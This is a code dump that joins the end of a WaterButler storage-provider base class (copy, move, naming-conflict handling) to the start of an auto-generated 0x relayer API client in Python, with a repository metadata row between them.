if callable(url):
url = url()
while retry >= 0:
try:
response = await aiohttp.request(method, url, *args, **kwargs)
if expects and response.status not in expects:
raise (await exceptions.exception_from_response(response, error=throws, **kwargs))
return response
except throws as e:
if retry <= 0 or e.code not in self._retry_on:
raise
await asyncio.sleep((1 + _retry - retry) * 2)
retry -= 1
def request(self, *args, **kwargs):
return RequestHandlerContext(self.make_request(*args, **kwargs))
async def move(self, dest_provider, src_path, dest_path, rename=None, conflict='replace', handle_naming=True):
"""Moves a file or folder from the current provider to the specified one
Performs a copy and then a delete.
Calls :func:`BaseProvider.intra_move` if possible.
:param BaseProvider dest_provider: The provider to move to
:param dict source_options: A dict to be sent to either :func:`BaseProvider.intra_move`
or :func:`BaseProvider.copy` and :func:`BaseProvider.delete`
:param dict dest_options: A dict to be sent to either :func:`BaseProvider.intra_move`
or :func:`BaseProvider.copy`
"""
args = (dest_provider, src_path, dest_path)
kwargs = {'rename': rename, 'conflict': conflict}
if handle_naming:
dest_path = await dest_provider.handle_naming(
src_path,
dest_path,
rename=rename,
conflict=conflict,
)
args = (dest_provider, src_path, dest_path)
kwargs = {}
# files and folders shouldn't overwrite themselves
if (
self.shares_storage_root(dest_provider) and
src_path.materialized_path == dest_path.materialized_path
):
raise exceptions.OverwriteSelfError(src_path)
if self.can_intra_move(dest_provider, src_path):
return (await self.intra_move(*args))
if src_path.is_dir:
metadata, created = await self._folder_file_op(self.move, *args, **kwargs)
else:
metadata, created = await self.copy(*args, handle_naming=False, **kwargs)
await self.delete(src_path)
return metadata, created
async def copy(self, dest_provider, src_path, dest_path, rename=None, conflict='replace', handle_naming=True):
args = (dest_provider, src_path, dest_path)
kwargs = {'rename': rename, 'conflict': conflict, 'handle_naming': handle_naming}
if handle_naming:
dest_path = await dest_provider.handle_naming(
src_path,
dest_path,
rename=rename,
conflict=conflict,
)
args = (dest_provider, src_path, dest_path)
kwargs = {}
# files and folders shouldn't overwrite themselves
if (
self.shares_storage_root(dest_provider) and
src_path.materialized_path == dest_path.materialized_path
):
raise exceptions.OverwriteSelfError(src_path)
if self.can_intra_copy(dest_provider, src_path):
return (await self.intra_copy(*args))
if src_path.is_dir:
return (await self._folder_file_op(self.copy, *args, **kwargs))
download_stream = await self.download(src_path)
if getattr(download_stream, 'name', None):
dest_path.rename(download_stream.name)
return (await dest_provider.upload(download_stream, dest_path))
async def _folder_file_op(self, func, dest_provider, src_path, dest_path, **kwargs):
"""Recursively apply func to src/dest path.
Called from: func: copy and move if src_path.is_dir.
Calls: func: dest_provider.delete and notes result for bool: created
func: dest_provider.create_folder
func: dest_provider.revalidate_path
func: self.metadata
:param coroutine func: to be applied to src/dest path
:param *Provider dest_provider: Destination provider
:param *ProviderPath src_path: Source path
:param *ProviderPath dest_path: Destination path
"""
assert src_path.is_dir, 'src_path must be a directory'
assert asyncio.iscoroutinefunction(func), 'func must be a coroutine'
try:
await dest_provider.delete(dest_path)
created = False
except exceptions.ProviderError as e:
if e.code != 404:
raise
created = True
folder = await dest_provider.create_folder(dest_path, folder_precheck=False)
dest_path = await dest_provider.revalidate_path(dest_path.parent, dest_path.name, folder=dest_path.is_dir)
folder.children = []
items = await self.metadata(src_path)
for i in range(0, len(items), settings.OP_CONCURRENCY):
futures = []
for item in items[i:i + settings.OP_CONCURRENCY]:
futures.append(asyncio.ensure_future(
func(
dest_provider,
# TODO figure out a way to cut down on all the requests made here
(await self.revalidate_path(src_path, item.name, folder=item.is_folder)),
(await dest_provider.revalidate_path(dest_path, item.name, folder=item.is_folder)),
handle_naming=False,
)
))
if item.is_folder:
await futures[-1]
if not futures:
continue
done, _ = await asyncio.wait(futures, return_when=asyncio.FIRST_EXCEPTION)
for fut in done:
folder.children.append(fut.result()[0])
return folder, created
async def handle_naming(self, src_path, dest_path, rename=None, conflict='replace'):
"""Given a WaterButlerPath and the desired name, handle any potential naming issues.
i.e.:
cp /file.txt /folder/ -> /folder/file.txt
cp /folder/ /folder/ -> /folder/folder/
cp /file.txt /folder/file.txt -> /folder/file.txt
cp /file.txt /folder/file.txt -> /folder/file (1).txt
cp /file.txt /folder/doc.txt -> /folder/doc.txt
:param WaterButlerPath src_path: The object that is being copied
:param WaterButlerPath dest_path: The path that is being copied to or into
:param str rename: The desired name of the resulting path, may be incremented
:param str conflict: The conflict resolution strategy, replace or keep
Returns: WaterButlerPath dest_path: The path of the desired result.
"""
if src_path.is_dir and dest_path.is_file:
# Cant copy a directory to a file
raise ValueError('Destination must be a directory if the source is')
if not dest_path.is_file:
# Directories always are going to be copied into
# cp /folder1/ /folder2/ -> /folder1/folder2/
dest_path = await self.revalidate_path(
dest_path,
rename or src_path.name,
folder=src_path.is_dir
)
dest_path, _ = await self.handle_name_conflict(dest_path, conflict=conflict)
return dest_path
def can_intra_copy(self, other, path=None):
"""Indicates if a quick copy can be performed between the current provider and `other`.
.. note::
Defaults to False
:param waterbutler.core.provider.BaseProvider other: The provider to check against
:rtype: bool
"""
return False
def can_intra_move(self, other, path=None):
"""Indicates if a quick move can be performed between the current provider and `other`.
.. note::
Defaults to False
:param waterbutler.core.provider.BaseProvider other: The provider to check against
:rtype: bool
"""
return False
def intra_copy(self, dest_provider, source_path, dest_path):
"""If the provider supports copying files and/or folders within itself by some means other
than download/upload, then ``can_intra_copy`` should return ``True``. This method will
implement the copy. It accepts the destination provider, a source path, and the
destination path. Returns the metadata for the newly created file and a boolean indicating
whether the copied entity is completely new (``True``) or overwrote a previously-existing
file (``False``).
:param BaseProvider dest_provider: a provider instance for the destination
:param WaterButlerPath source_path: the Path of the entity being copied
:param WaterButlerPath dest_path: the Path of the destination being copied to
:rtype: (:class:`waterbutler.core.metadata.BaseFileMetadata`, :class:`bool`)
"""
raise NotImplementedError
async def intra_move(self, dest_provider, src_path, dest_path):
"""If the provider supports moving files and/or folders within itself by some means other
than download/upload/delete, then ``can_intra_move`` should return ``True``. This method
will implement the move. It accepts the destination provider, a source path, and the
destination path. Returns the metadata for the newly created file and a boolean indicating
whether the moved entity is completely new (``True``) or overwrote a previously-existing
file (``False``).
:param BaseProvider dest_provider: a provider instance for the destination
:param WaterButlerPath source_path: the Path of the entity being moved
:param WaterButlerPath dest_path: the Path of the destination being moved to
:rtype: (:class:`waterbutler.core.metadata.BaseFileMetadata`, :class:`bool`)
"""
data, created = await self.intra_copy(dest_provider, src_path, dest_path)
await self.delete(src_path)
return data, created
async def exists(self, path, **kwargs):
"""Check for existence of WaterButlerPath
Attempt to retrieve provider metadata to determine existence of a WaterButlerPath. If
successful, will return the result of `self.metadata()` which may be `[]` for empty
folders.
:param WaterButlerPath path: path to check for
:rtype: (`self.metadata()` or False)
"""
try:
return (await self.metadata(path, **kwargs))
except exceptions.NotFoundError:
return False
except exceptions.MetadataError as e:
if e.code != 404:
raise
return False
async def handle_name_conflict(self, path, conflict='replace', **kwargs):
"""Check WaterButlerPath and resolve conflicts
Given a WaterButlerPath and a conflict resolution pattern determine
the correct file path to upload to and indicate if that file exists or not
:param WaterButlerPath path: Desired path to check for conflict
:param str conflict: replace, keep, warn
:rtype: (WaterButlerPath, provider.metadata() or False)
:raises: NamingConflict
"""
exists = await self.exists(path, **kwargs)
if (not exists and not exists == []) or conflict == 'replace':
return path, exists
if conflict == 'warn':
raise exceptions.NamingConflict(path)
while True:
path.increment_name()
test_path = await self.revalidate_path(
path.parent,
path.name,
folder=path.is_dir
)
exists = await self.exists(test_path, **kwargs)
if not (exists or exists == []):
break
return path, False
async def revalidate_path(self, base, path, folder=False):
"""Take a path and a base path and build a WaterButlerPath representing `/base/path`. For
id-based providers, this will need to lookup the id of the new child object.
:param WaterButlerPath base: The base folder to look under
:param str path: the path of a child of `base`, relative to `base`
:param bool folder: whether the returned WaterButlerPath should represent a folder
:rtype: WaterButlerPath
"""
return base.child(path, folder=folder)
async def zip(self, path, **kwargs):
"""Streams a Zip archive of the given folder
:param str path: The folder to compress
"""
metadata = await self.metadata(path)
if path.is_file:
metadata = [metadata]
path = path.parent
return streams.ZipStreamReader(ZipStreamGenerator(self, path, *metadata))
def shares_storage_root(self, other):
"""Returns True if ``self`` and ``other`` both point to the same storage root. Used to
detect when a file move/copy action might result in the file overwriting itself. Most
providers have enough uniquely identifing information in the settings to detect this,
but some providers may need to override this to do further detection.
:param BaseProvider other: another provider instance to compare with
:returns bool: True if both providers use the same storage root.
"""
return self.NAME == other.NAME and self.settings == other.settings
@abc.abstractmethod
def can_duplicate_names(self):
"""Returns True if a file and a folder in the same directory can have identical names."""
raise NotImplementedError
@abc.abstractmethod
def download(self, **kwargs):
"""Download a file from this provider.
:param dict \*\*kwargs: Arguments to be parsed by child classes
:rtype: :class:`waterbutler.core.streams.ResponseStreamReader`
:raises: :class:`waterbutler.core.exceptions.DownloadError`
"""
raise NotImplementedError
@abc.abstractmethod
def upload(self, stream, **kwargs):
"""Uploads the given stream to the provider. Returns the metadata for the newly created
file and a boolean indicating whether the file is completely new (``True``) or overwrote
a previously-existing file (``False``)
:param dict \*\*kwargs: Arguments to be parsed by child classes
:rtype: (:class:`waterbutler.core.metadata.BaseFileMetadata`, :class:`bool`)
:raises: :class:`waterbutler.core.exceptions.DeleteError`
"""
raise NotImplementedError
@abc.abstractmethod
def delete(self, **kwargs):
"""
:param dict \*\*kwargs: Arguments to be parsed by child classes
:rtype: :class:`None`
:raises: :class:`waterbutler.core.exceptions.DeleteError`
"""
raise NotImplementedError
@abc.abstractmethod
def metadata(self, **kwargs):
"""Get metdata about the specified resource from this provider. Will be a :class:`list`
if the resource is a directory otherwise an instance of
:class:`waterbutler.core.metadata.BaseFileMetadata`
:param dict \*\*kwargs: Arguments to be parsed by child classes
:rtype: :class:`waterbutler.core.metadata.BaseMetadata`
:rtype: :class:`list` of :class:`waterbutler.core.metadata.BaseMetadata`
:raises: :class:`waterbutler.core.exceptions.MetadataError`
"""
raise NotImplementedError
@abc.abstractmethod
def validate_v1_path(self, path, **kwargs):
"""API v1 requires that requests against folder endpoints always end with a slash, and
requests against files never end with a slash. This method checks the provider's metadata
for the given id and throws a 404 Not Found if the implicit and explicit types don't
match. This method duplicates the logic in the provider's validate_path method, but
validate_path must currently accomodate v0 AND v1 semantics. After v0's retirement, this
method can replace validate_path.
:param str path: user-supplied path to validate
:rtype: :class:`waterbutler.core.path`
:raises: :class:`waterbutler.core.exceptions.NotFoundError`
"""
raise NotImplementedError
@abc.abstractmethod
def validate_path(self, path, **kwargs):
raise NotImplementedError
def path_from_metadata(self, parent_path, metadata):
return parent_path.child(metadata.name, _id=metadata.path.strip('/'), folder=metadata.is_folder)
def revisions(self, **kwargs):
return [] # TODO Raise 405 by default h/t @rliebz
def create_folder(self, path, **kwargs):
"""Create a folder in the current provider at `path`. Returns a `BaseFolderMetadata` object
if successful. May throw a 409 Conflict if a directory with the same name already exists.
:param str path: user-supplied path to create. must be a directory.
:param boolean precheck_folder: flag to check for folder before attempting create
:rtype: :class:`waterbutler.core.metadata.BaseFolderMetadata`
:raises: :class:`waterbutler.core.exceptions.FolderCreationError`
"""
raise exceptions.ProviderError({'message': 'Folder creation not supported.'}, code=405)
def _build_range_header(self, slice_tup):
start, end = slice_tup
return 'bytes={}-{}'.format(
'' if start is None else start,
'' if end is None else end
)
def __repr__(self):
# Note: credentials are not included on purpose.
return ('<{}({}, {})>'.format(self.__class__.__name__, self.auth, self.settings))
| 40.091993 | 114 | 0.633849 |
4e1fac032bbf33462ef2282a0675c8904ea80a2f | 45,014 | py | Python | python-packages/sra_client/sra_client/api/default_api.py | dave4506/0x-monorepo | fdcad84cee45781a06cab6b6b17f4a48c275d713 | [
"Apache-2.0"
] | 2 | 2019-04-14T01:03:32.000Z | 2019-04-14T01:03:33.000Z | python-packages/sra_client/sra_client/api/default_api.py | Lambda07/0x-monorepo | c78a60299053f0ec825bf34dd3ea0cea7bb9365b | [
"Apache-2.0"
] | null | null | null | python-packages/sra_client/sra_client/api/default_api.py | Lambda07/0x-monorepo | c78a60299053f0ec825bf34dd3ea0cea7bb9365b | [
"Apache-2.0"
] | 1 | 2021-05-02T08:24:10.000Z | 2021-05-02T08:24:10.000Z | # coding: utf-8
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sra_client.api_client import ApiClient
from sra_client.models.relayer_api_order_config_payload_schema import (
RelayerApiOrderConfigPayloadSchema,
)
class DefaultApi(object):
"""Default API for SRA compliant 0x relayers."""
# NOTE: This class is auto generated by OpenAPI Generator
# Ref: https://openapi-generator.tech
# Do not edit the class manually.
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_asset_pairs(self, **kwargs):
"""get_asset_pairs
Retrieves a list of available asset pairs and the information
required to trade them (in any order). Setting only `assetDataA` or
`assetDataB` returns pairs filtered by that asset only.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_asset_pairs(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str asset_data_a: The assetData value for the first asset in the pair.
:param str asset_data_b: The assetData value for the second asset in the pair.
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiAssetDataPairsResponseSchema`.
If the method is called asynchronously returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_asset_pairs_with_http_info(**kwargs)
else:
(data) = self.get_asset_pairs_with_http_info(**kwargs)
return data
def get_asset_pairs_with_http_info(self, **kwargs):
"""get_asset_pairs
Retrieves a list of available asset pairs and the information
required to trade them (in any order). Setting only `assetDataA` or
`assetDataB` returns pairs filtered by that asset only.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_asset_pairs_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str asset_data_a: The assetData value for the first asset in the pair.
:param str asset_data_b: The assetData value for the second asset in the pair.
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiAssetDataPairsResponseSchema`.
If the method is called asynchronously returns the request thread.
"""
local_var_params = locals()
all_params = [
"asset_data_a",
"asset_data_b",
"network_id",
"page",
"per_page",
]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_asset_pairs" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
collection_formats = {}
path_params = {}
query_params = []
if "asset_data_a" in local_var_params:
query_params.append(
("assetDataA", local_var_params["asset_data_a"])
)
if "asset_data_b" in local_var_params:
query_params.append(
("assetDataB", local_var_params["asset_data_b"])
)
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
if "page" in local_var_params:
query_params.append(("page", local_var_params["page"]))
if "per_page" in local_var_params:
query_params.append(("perPage", local_var_params["per_page"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/asset_pairs",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiAssetDataPairsResponseSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_fee_recipients(self, **kwargs):
"""get_fee_recipients
Retrieves a collection of all fee recipient addresses for a relayer.
This endpoint should be paginated.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_fee_recipients(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiFeeRecipientsResponseSchema`.
If the method is called asynchronously, returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_fee_recipients_with_http_info(**kwargs)
else:
(data) = self.get_fee_recipients_with_http_info(**kwargs)
return data
def get_fee_recipients_with_http_info(self, **kwargs):
"""get_fee_recipients
Retrieves a collection of all fee recipient addresses for a relayer.
This endpoint should be paginated.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_fee_recipients_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiFeeRecipientsResponseSchema`.
If the method is called asynchronously, returns the request thread.
"""
local_var_params = locals()
all_params = ["network_id", "page", "per_page"]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fee_recipients" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
collection_formats = {}
path_params = {}
query_params = []
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
if "page" in local_var_params:
query_params.append(("page", local_var_params["page"]))
if "per_page" in local_var_params:
query_params.append(("perPage", local_var_params["per_page"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/fee_recipients",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiFeeRecipientsResponseSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_order(self, order_hash, **kwargs):
"""get_order
Retrieves the 0x order with meta info that is associated with the hash.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_order(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str order_hash: The hash of the desired 0x order. (required)
:param float network_id: The id of the Ethereum network
:return: :class:`RelayerApiOrderSchema`.
If the method is called asynchronously, returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_order_with_http_info(order_hash, **kwargs)
else:
(data) = self.get_order_with_http_info(order_hash, **kwargs)
return data
def get_order_with_http_info(self, order_hash, **kwargs):
"""get_order
Retrieves the 0x order with meta info that is associated with the hash.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_order_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str order_hash: The hash of the desired 0x order. (required)
:param float network_id: The id of the Ethereum network
:return: :class:`RelayerApiOrderSchema`.
If the method is called asynchronously returns the request thread.
"""
local_var_params = locals()
all_params = ["order_hash", "network_id"]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_order" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'order_hash' is set
if (
"order_hash" not in local_var_params
or local_var_params["order_hash"] is None
):
raise ValueError(
"Missing the required parameter `order_hash` when calling `get_order`"
)
collection_formats = {}
path_params = {}
if "order_hash" in local_var_params:
path_params["orderHash"] = local_var_params["order_hash"]
query_params = []
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/order/{orderHash}",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiOrderSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_order_config(self, **kwargs):
"""get_order_config
Relayers have full discretion over the orders that they are willing
to host on their orderbooks (e.g what fees they charge, etc...). In
order for traders to discover their requirements programmatically,
they can send an incomplete order to this endpoint and receive the
missing fields, specifc to that order. This gives relayers a large
amount of flexibility to tailor fees to unique traders, trading pairs
and volume amounts. Submit a partial order and receive information
required to complete the order: `senderAddress`,
`feeRecipientAddress`, `makerFee`, `takerFee`.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_order_config(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param relayer_api_order_config_payload_schema: instance of
:class:`RelayerApiOrderConfigPayloadSchema`. The fields of a 0x
order the relayer may want to decide what configuration to send
back.
:return: :class:`RelayerApiOrderConfigResponseSchema`.
If the method is called asynchronously returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_order_config_with_http_info(**kwargs)
else:
(data) = self.get_order_config_with_http_info(**kwargs)
return data
def get_order_config_with_http_info(self, **kwargs):
"""get_order_config
Relayers have full discretion over the orders that they are willing
to host on their orderbooks (e.g what fees they charge, etc...). In
order for traders to discover their requirements programmatically,
they can send an incomplete order to this endpoint and receive the
missing fields, specifc to that order. This gives relayers a large
amount of flexibility to tailor fees to unique traders, trading pairs
and volume amounts. Submit a partial order and receive information
required to complete the order: `senderAddress`,
`feeRecipientAddress`, `makerFee`, `takerFee`.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_order_config_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param float network_id: The id of the Ethereum network
:param relayer_api_order_config_payload_schema: instance of
:class: `RelayerApiOrderConfigPayloadSchema`. The fields of a 0x
order the relayer may want to decide what configuration to send
back.
:return: :class:`RelayerApiOrderConfigResponseSchema`.
If the method is called asynchronously returns the request thread.
"""
local_var_params = locals()
all_params = ["network_id", "relayer_api_order_config_payload_schema"]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_order_config" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
collection_formats = {}
path_params = {}
query_params = []
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "relayer_api_order_config_payload_schema" in local_var_params:
body_params = local_var_params[
"relayer_api_order_config_payload_schema"
]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# HTTP header `Content-Type`
header_params[
"Content-Type"
] = self.api_client.select_header_content_type(["application/json"])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/order_config",
"POST",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiOrderConfigResponseSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_orderbook(self, base_asset_data, quote_asset_data, **kwargs):
"""get_orderbook
Retrieves the orderbook for a given asset pair. This endpoint should
be paginated. Bids will be sorted in
descending order by price, and asks will be sorted in ascending order
by price. Within the price sorted orders, the orders are further
sorted by **taker fee price** which is defined as the **takerFee**
divided by **takerTokenAmount**. After **taker fee price**, orders are
to be sorted by expiration in ascending order. The way pagination
works for this endpoint is that the **page** and **perPage** query
params apply to both `bids` and `asks` collections, and if `page` *
`perPage` = `total` for a certain collection, the `records` for that
collection should just be empty.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_orderbook(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str base_asset_data: assetData (makerAssetData or
takerAssetData) designated as the base currency in the
`currency pair calculation
<https://en.wikipedia.org/wiki/Currency_pair>`__
of price. (required)
:param str quote_asset_data: assetData (makerAssetData or
takerAssetData) designated as the quote currency in the currency
pair calculation of price. (required)
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiOrderbookResponseSchema`.
If the method is called asynchronously, returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.get_orderbook_with_http_info(
base_asset_data, quote_asset_data, **kwargs
)
else:
(data) = self.get_orderbook_with_http_info(
base_asset_data, quote_asset_data, **kwargs
)
return data
def get_orderbook_with_http_info(
self, base_asset_data, quote_asset_data, **kwargs
):
"""get_orderbook
Retrieves the orderbook for a given asset pair. This endpoint should
be paginated. Bids will be sorted in
descending order by price, and asks will be sorted in ascending order
by price. Within the price sorted orders, the orders are further
sorted by **taker fee price** which is defined as the **takerFee**
divided by **takerTokenAmount**. After **taker fee price**, orders are
to be sorted by expiration in ascending order. The way pagination
works for this endpoint is that the **page** and **perPage** query
params apply to both `bids` and `asks` collections, and if `page` *
`perPage` = `total` for a certain collection, the `records` for that
collection should just be empty.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_orderbook_with_http_info(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str base_asset_data: assetData (makerAssetData or
takerAssetData) designated as the base currency in the
`currency pair calculation
<https://en.wikipedia.org/wiki/Currency_pair>`__
of price. (required)
:param str quote_asset_data: assetData (makerAssetData or
takerAssetData) designated as the quote currency in the currency
pair calculation of price. (required)
:param float network_id: The id of the Ethereum network
:param float page: The number of the page to request in the collection.
:param float per_page: The number of records to return per page.
:return: :class:`RelayerApiOrderbookResponseSchema`.
If the method is called asynchronously, returns the request thread.
"""
local_var_params = locals()
all_params = [
"base_asset_data",
"quote_asset_data",
"network_id",
"page",
"per_page",
]
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_orderbook" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'base_asset_data' is set
if (
"base_asset_data" not in local_var_params
or local_var_params["base_asset_data"] is None
):
raise ValueError(
"Missing the required parameter `base_asset_data`"
"when calling `get_orderbook`"
)
# verify the required parameter 'quote_asset_data' is set
if (
"quote_asset_data" not in local_var_params
or local_var_params["quote_asset_data"] is None
):
raise ValueError(
"Missing the required parameter `quote_asset_data`"
" when calling `get_orderbook`"
)
collection_formats = {}
path_params = {}
query_params = []
if "base_asset_data" in local_var_params:
query_params.append(
("baseAssetData", local_var_params["base_asset_data"])
)
if "quote_asset_data" in local_var_params:
query_params.append(
("quoteAssetData", local_var_params["quote_asset_data"])
)
if "network_id" in local_var_params:
query_params.append(("networkId", local_var_params["network_id"]))
if "page" in local_var_params:
query_params.append(("page", local_var_params["page"]))
if "per_page" in local_var_params:
query_params.append(("perPage", local_var_params["per_page"]))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
)
# Authentication setting
auth_settings = []
return self.api_client.call_api(
"/v2/orderbook",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="RelayerApiOrderbookResponseSchema",
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
),
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_orders(self, **kwargs):
"""get_orders
Retrieves a list of orders given query parameters. This endpoint
should be paginated. For querying an entire
orderbook snapshot, the orderbook endpoint
is recommended. If both makerAssetData and takerAssetData are
specified, returned orders will be sorted by price determined by
(takerTokenAmount/makerTokenAmount) in ascending order. By default,
orders returned by this endpoint are unsorted.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass `async_req` = **True**
>>> thread = api.get_orders(async_req=True) # doctest: +SKIP
>>> result = thread.get() # doctest: +SKIP
:param bool async_req: Whether request should be asynchronous.
:param str maker_asset_proxy_id: The maker
`asset proxy id
<https://0xproject.com/docs/0x.js#types-AssetProxyId>`__
(example: "0xf47261b0" for ERC20, "0x02571792" for ERC721).
:param str taker_asset_proxy_id: The taker asset
`asset proxy id
